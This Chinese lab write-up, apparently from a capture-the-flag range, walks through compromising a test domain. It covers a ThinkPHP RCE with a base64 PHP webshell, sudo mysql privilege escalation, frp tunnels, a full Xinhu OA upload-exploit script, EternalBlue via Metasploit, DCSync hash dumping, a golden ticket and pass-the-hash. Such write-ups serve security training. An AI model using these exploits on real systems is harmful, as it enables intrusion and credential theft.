入门级靶场,速通一下

fscan扫描外网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
D:\shentou\fscan>fscan.exe -h 39.99.243.114 -p 1-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.243.114:22 open
39.99.243.114:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.243.114 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.99.243.114 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 5m11.4893336s

flag1

thinkphp老洞,先一把梭写个马,然后连上蚁剑
alt text

tips:rce时可以这样写马

1
echo 'PD9waHAgZXZhbCgkX1BPU1RbIjEiXSk7ID8+'|base64 -d>shell.php

连上蚁剑终端发现权限比较低,先sudo -l看一下

1
2
3
4
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql

发现mysql可以有root权限,且免密

查找并读取flag

1
2
sudo mysql -e '\! find / -name flag*'
sudo mysql -e '\! cat /root/flag/flag01.txt'

alt text

上传fscan和frp

ifconfig看到内网IP是172.22.1.15,那么用fscan扫一下这个网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.2:88 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

整理一下信息
外网入口39.99.243.114,其内网IP是172.22.1.15,已经拿下
内网主机172.22.1.2,为域控制器 DC:DC01.xiaorang.lab
内网主机172.22.1.18,为域内主机XIAORANG-OA01.xiaorang.lab,80端口有个信呼协同办公系统
内网主机172.22.1.21,为域内主机XIAORANG-WIN7.xiaorang.lab,存在MS17-010

最后应该是要通过172.22.1.21去打域控的,先把172.22.1.18打了,做一下frp代理

frpc.toml

1
2
3
4
5
6
7
8
9
serverAddr = "xxx.xxx.xxx.xxx"
serverPort = 7000

[[proxies]]
name = "oa"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 20022

flag2

首页看到是信呼协同办公系统v2.2.8

使用弱密码admin/admin123直接登录
然后就是复现nday

先在exp.py同目录放一个1.php,内容如下

1
<?php eval($_POST[1]);?>

然后exp直接打
exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

session = requests.session()
url_pre = 'http://vps:20022/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = { 'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0', 'adminuser': 'YWRtaW4=', 'adminpass': 'YWRtaW4xMjM=', 'yanzm': '' }
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
data2 = {"1": "system('dir');"}
r = session.post(url_pre + filepath, data=data2)
print(r.text.encode('utf-8'))

从列出的目录里可以找到木马的文件名,直接蚁剑连上即可

alt text

flag3

接下来打172.22.1.21,首先搭一个socks代理

frpc.toml

1
2
3
4
5
6
7
8
[common]
server_addr = xxx.xxx.xxx.xxx
server_port = 7000

[socks5]
type = tcp
plugin = socks5
remote_port = 5000

然后用msf打

1
2
3
4
5
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

alt text

接下来是横向移动去打域控

想进行DCSync攻击,必须获得以下任一用户的权限:

1
2
3
4
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
即:默认情况下域管理员组具有该权限

这里我们用永恒之蓝打完本来就是system权限,因此可以进行DCSync攻击

利用DCSync

1
load kiwi

导出域内所有用户Hash

1
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
1
2
3
4
5
6
7
8
9
10
11
12
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ e42fafd0e2581f9949964505dfee032b 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ 57db46b9d3f9df2dec50c8deb355e844 4096
1108 XIAORANG-WIN7$ 082b914dd550e3f17e88cd82d34f8b34 4096

生成黄金票据

1
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2022/6/5 20:40:39
Object Security ID : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID : 502

Credentials:
Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
lm - 0: c4f45322c850c77aecb3aa71c2e44c1e

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 849f7f8ab6eb3b3a1c7c926de5ee5574

* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : acbbedcabc9ad1d8638cda298e15761626e1bce7ce80eae90d95252f8162bba8
aes128_hmac (4096) : 207ea00513bdf19042937aa38c9ad2dd
des_cbc_md5 (4096) : c70ee386138c7016

* Primary:Kerberos *
Default Salt : XIAORANG.LABkrbtgt
Credentials
des_cbc_md5 : c70ee386138c7016

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 e1108dfe63de9eeca1eefb995e0929bf
02 20b58dbb0fc4e2b4e2cb7ab85f3e711f
03 8a758e996035e1bc42ff1632cf94d2f4
04 e1108dfe63de9eeca1eefb995e0929bf
05 20b58dbb0fc4e2b4e2cb7ab85f3e711f
06 17b26c73d1998bf5e4389b6c946375b9
07 e1108dfe63de9eeca1eefb995e0929bf
08 44fae0b038a11e0aa22bf9c0bb56fde3
09 44fae0b038a11e0aa22bf9c0bb56fde3
10 72d34f6f745066292fc20c2bb9afe9aa
11 64bb1fe398f58cb09752c6cf99ba38d7
12 44fae0b038a11e0aa22bf9c0bb56fde3
13 3a6c03097d06f3d661fab05dd266b8db
14 64bb1fe398f58cb09752c6cf99ba38d7
15 066092366aa2d4cac0c40b732c663580
16 066092366aa2d4cac0c40b732c663580
17 109ffa596356b70d245729765d970b84
18 b38c61423c6240cc51e237825b24011f
19 659c24dbf455331d171d56dee8ce401f
20 70ac8d2c7e5d33c8b05d05bf48dfc66d
21 04a52bb90362eb38a60a2a7879232aac
22 04a52bb90362eb38a60a2a7879232aac
23 0de96f588c278f0520ce23606f88894b
24 b3785273258b55001fec33d8adb718d8
25 b3785273258b55001fec33d8adb718d8
26 65dcf594b8a0be48f803aba2c8c02fd1
27 803052ac4fb8934f4aba581e8533fdb5
28 32b62b5536e1ca61eb0ae7e1fb69f0c9
29 01cb2d0d07700cbf85f27dcf2d15eee0

导入黄金票据

1
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
User      : administrator
Domain : xiaorang.lab (XIAORANG)
SID : S-1-5-21-314492864-3856862959-4045974917-502
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: fb812eea13a18b7fcdb8e6d67ddc205b - rc4_hmac_nt
Lifetime : 2025/7/10 21:21:04 ; 2035/7/8 21:21:04 ; 2035/7/8 21:21:04
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ xiaorang.lab' successfully submitted for current session

之前已经获取了Administrator的hash,接下来可以用wmiexec或者crackmapexec来hash传递了

wmiexec哈希传递

1
proxychains python3 wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"

alt text

完结撒花,耗时1小时22分钟8秒